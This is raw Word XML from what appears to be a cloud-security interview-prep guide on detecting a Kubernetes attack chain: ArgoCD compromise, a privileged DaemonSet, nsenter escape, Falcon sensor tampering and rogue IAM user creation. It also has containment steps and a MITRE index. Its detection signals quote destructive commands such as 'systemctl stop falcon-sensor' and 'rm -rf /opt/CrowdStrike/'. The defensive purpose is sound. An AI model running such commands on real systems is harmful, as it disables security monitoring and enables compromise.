        <w:t xml:space="preserve">  [K8s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K8s audit log: DaemonSet created in kube-system namespace by argocd-application-controller ServiceAccount. This is anomalous: ArgoCD should deploy to application namespaces, never kube-system. DaemonSet spec includes: privileged:true, hostPID:true, hostNetwork:true, image from unapproved registry.</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SuspiciousKubernetesDaemonSet | KubernetesAudit.PrivilegedWorkloadInSystemNamespace | KAC DENY (if enforced)</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CloudTrail for K8s DaemonSet creation. However: ECR image pull logs — image is NOT from approved ECR registry (external IP).</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Policy:Kubernetes/AnonymousAccessGranted or Execution:Kubernetes/Backdoor:Runtime/ContainerWithPrivilegedAccess.</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DIRECT: verb:create, resource:daemonsets, namespace:kube-system, user:system:serviceaccount:argocd:argocd-application-controller. This combination is a critical alert trigger.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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6B3C"/>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ArgoCD creating DaemonSets in kube-system is never legitimate — ArgoCD should not manage kube-system workloads. This is a near-zero false positive alert. Only valid exception: if ArgoCD explicitly manages Falcon sensor DaemonSet deployment via an approved pattern documented in runbooks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Privileged DaemonSet Pod Running on Every Node</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Falcon sensor (running as DaemonSet on all nodes) detects new privileged pod on each node: node-monitor-agent with securityContext.privileged:true, hostPID:true. Container immediately executes nsenter --target 1 with all namespace flags. Pattern fires simultaneously on all nodes within 2 minutes of DaemonSet creation.</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ContainerEscape.NsenterToHostNamespace (fires on EVERY node simultaneously) | InteractiveContainerSession.Privileged | PREVENT → processes killed on all nodes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Simultaneous IMDS access from all node IPs if attacker reaches stage2 before PREVENT. Unusual GetSecurityToken spike from all EC2 instances.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PrivilegeEscalation:Kubernetes/PrivilegedContainer fires for each pod instance across all nodes.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DaemonSet pod creation events across all nodes within 2-minute window — bulk pod creation is visually distinct in audit log.</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Legitimate DaemonSets (Falcon, Fluentd, Datadog) are pre-approved and their pod specs are known. Any NEW DaemonSet in kube-system with privileged:true not matching an approved pattern is an immediate Critical incident. Use a pod spec allowlist in KAC for kube-system namespace.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to Disable Falcon Sensor (Defense Evasion)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  [CWPP]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Stage2 script attempts: systemctl stop falcon-sensor, rmmod falcon_lsm_serviceable, and rm -rf /opt/CrowdStrike/. Falcon sensor detects its own tamper attempt via self-monitoring. Even if the rmmod partially succeeds, the sensor sends a final tamper alert before going offline. Absence of sensor heartbeat is also an alert in Falcon console.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TamperingAttempt.SensorRemoval | SuspiciousKernelModuleUnload | SelfProtection triggered</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If CloudTrail itself is targeted: StopLogging event from node instance profile. Combined with sensor tamper: attacker is executing a cover-tracks playbook.</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PrivilegeEscalation:Runtime/ContainerWithPrivilegedAccess (ongoing from Detection 3). No specific GuardDuty finding for EDR removal.</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K8s audit for host-level systemctl commands. Alert on sensor heartbeat gap in Falcon console.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F5C9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Sensor removal is never a legitimate operation in production. Any systemctl stop falcon-sensor outside of an approved maintenance window with a change ticket = immediate Critical incident. Falcon self-protection should prevent clean removal, but the attempt itself is definitive evidence of attacker presence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B2D8E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">New IAM User Created from EC2 Instance Profile (Post-Escape)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B2D8E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  [CloudTrail]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3ECF9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B2D8E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Signal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CloudTrail records iam:CreateUser, iam:CreateLoginProfile, iam:AttachUserPolicy (AdministratorAccess) — all from the node EC2 instance profile ARN (not a human user, not a pipeline). EC2 instance profiles should never create IAM users. This is a known persistence technique to survive Kubernetes-level remediation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F3ECF9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B2D8E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Falcon Alert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1B2A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CIEM: ShadowAdminDetected.IAMUserCreation | CloudTrailAlert: iam:CreateUser from EC2 instance role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F3ECF9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B2D8E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CloudTrail / K8s Audit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DIRECT SOURCE: iam:CreateUser, sourceIdentity: i-0a1b2c3d (EC2 instance), userAgent: python-boto3. Timestamp correlates exactly with stage2 execution on the node.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F3ECF9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B2D8E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GuardDuty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Persistence:IAMUser/NetworkPermissions or Persistence:IAMUser/UserCreatedProgrammatically.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F3ECF9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B2D8E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">K8s Audit Event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K8s audit for IAM user creation. This is a cloud-layer persistence that Kubernetes audit logs cannot see — showing why CloudTrail + CWPP correlation is essential.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F3ECF9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B2D8E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">False Pos. Logic</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EC2 instance profiles (node roles) should NEVER have iam:CreateUser permission. This is a CSPM HIGH finding if it exists. If this CloudTrail event fires — it means: (1) KAC failed to block the DaemonSet, (2) CWPP PREVENT failed or was disabled, (3) the node role had excessive IAM permissions. Triple failure requiring full post-incident review.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment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DEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate Response Steps:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1) Delete the ArgoCD Application and DaemonSet immediately. 2) Change ArgoCD admin password and enable SSO. 3) Remove the public LoadBalancer — move to VPN-only access. 4) Delete the rogue IAM user and revoke all sessions. 5) Delete and replace all compromised nodes. 6) Restrict ArgoCD RBAC — ArgoCD SA cannot create DaemonSets in kube-system. 7) KAC: block any DaemonSet in kube-system not from approved image list.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Interview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9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E6B3C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">How to explain this scenario in the interview:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"This attack chain is terrifying because it's a force multiplier — one ArgoCD compromise becomes a DaemonSet on EVERY node simultaneously. The CSPM finding about public ArgoCD exposure was 11 days old. That's the root cause. I push for a simple rule: any CRITICAL CSPM finding not remediated in 72 hours auto-generates a P1 incident ticket and pages the CISO. The finding was the warning. The breach was the consequence of ignoring it."</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">MASTER MITRE ATT&amp;CK INDEX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F5C9E" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete mapping of all 25 MITRE techniques across the 5 scenarios.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2400"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="3680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="4"/>
              <w:left w:val="single" w:color="999999" w:sz="4"/>
              <w:bottom w:val="single" w:color="999999" w:sz="4"/>
              <w:right w:val="single" w:color="999999" w:sz="4"/>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Scen.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="4"/>
              <w:left w:val="single" w:color="999999" w:sz="4"/>
              <w:bottom w:val="single" w:color="999999" w:sz="4"/>
              <w:right w:val="single" w:color="999999" w:sz="4"/>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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="4"/>
              <w:left w:val="single" w:color="999999" w:sz="4"/>
              <w:bottom w:val="single" w:color="999999" w:sz="4"/>
              <w:right w:val="single" w:color="999999" w:sz="4"/>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Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="4"/>
              <w:left w:val="single" w:color="999999" w:sz="4"/>
              <w:bottom w:val="single" w:color="999999" w:sz="4"/>
              <w:right w:val="single" w:color="999999" w:sz="4"/>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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3680"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="4"/>
              <w:left w:val="single" w:color="999999" w:sz="4"/>
              <w:bottom w:val="single" w:color="999999" w:sz="4"/>
              <w:right w:val="single" w:color="999999" w:sz="4"/>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Detection Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D6E4F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F5C9E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S1</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T1190</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Exploit Public-Facing Application</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Initial Access</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1: Reverse TCP Shell via Process Lineage</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F5C9E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S1</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T1059.004</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Unix Shell</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Execution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2: First-Seen External Domain from Container</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F5C9E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S1</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T1071.001</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Web Protocols (HTTPS C2)</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Command &amp; Control</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3: Environment Variable Credential Scraping</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F5C9E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S1</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T1041</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Exfiltration Over C2 Channel</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Exfiltration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4: Service Account Token Read Post-Exploit</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F5C9E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S1</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T1082</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System Information Discovery</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Discovery</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5: Outbound Data Exfiltration Volume Spike</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>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S2</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T1611</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Escape to Host</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Privilege Escalation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1: Dirty Pipe Kernel Exploit Syscall Sequence</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S2</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T1068</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Exploitation for Privilege Escalation</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Privilege Escalation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2: nsenter with Full Host Namespace Flags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S2</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T1552.007</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Container API</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Credential Access</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3: Offensive Tool Drop to /tmp (Container Drift)</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S2</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T1021.007</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Cloud Services (K8s Lateral)</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Lateral Movement</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4: Bulk Secret Harvest from Node Filesystem</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S2</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T1485</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Data Destruction (Defense Evasion)</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Impact</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5: Node IMDS Credential Theft Post-Escape</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E6B3C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S3</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T1195.002</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Compromise Software Supply Chain</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Initial Access</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1: Anomalous Library Load — SHA256 Mismatch</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E6B3C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S3</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T1496</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Resource Hijacking</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Impact</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2: Python Process Connecting to Known Mining Pool</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E6B3C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S3</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T1071.001</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Application Layer Protocol (Mining Pool)</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C2</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3: CPU Throttling Pattern — Intentional Underutilization</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E6B3C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S3</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T1036.005</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Masquerading: Match Legitimate Name</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Defense Evasion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4: Image Floating Tag — CSPM Supply Chain Finding</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E6B3C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S3</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T1543</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Create or Modify System Process</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Persistence</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5: Modified Base Image Layer — Falcon Image Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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b/>
                <w:bCs/>
                <w:color w:val="A0522D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S4</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T1078.001</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Valid Accounts: Default Accounts</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Initial Access</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1: kubectl exec from Unexpected Source IP / UserAgent</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A0522D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S4</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T1059.004</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Unix Shell</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Execution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2: Interactive Shell + Credential Enumeration Pattern</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A0522D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S4</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T1552.001</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Credentials in Files (Env Vars)</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Credential Access</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3: Database Connection Anomaly from Container</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A0522D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S4</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T1005</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Data from Local System</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Collection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4: Large File Written to /tmp and Uploaded via curl</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A0522D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S4</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T1041</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Exfiltration Over C2 Channel</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Exfiltration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5: CSPM — Service Account with pods/exec in Production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F3ECF9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B2D8E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S5</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T1078.004</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Valid Accounts: Cloud Accounts</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Initial Access</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1: ArgoCD Admin Auth from Unknown External IP</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5B2D8E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S5</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T1053.007</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Scheduled Task: Container Orchestration Job</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Persistence</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2: DaemonSet Created in kube-system by ArgoCD</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5B2D8E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
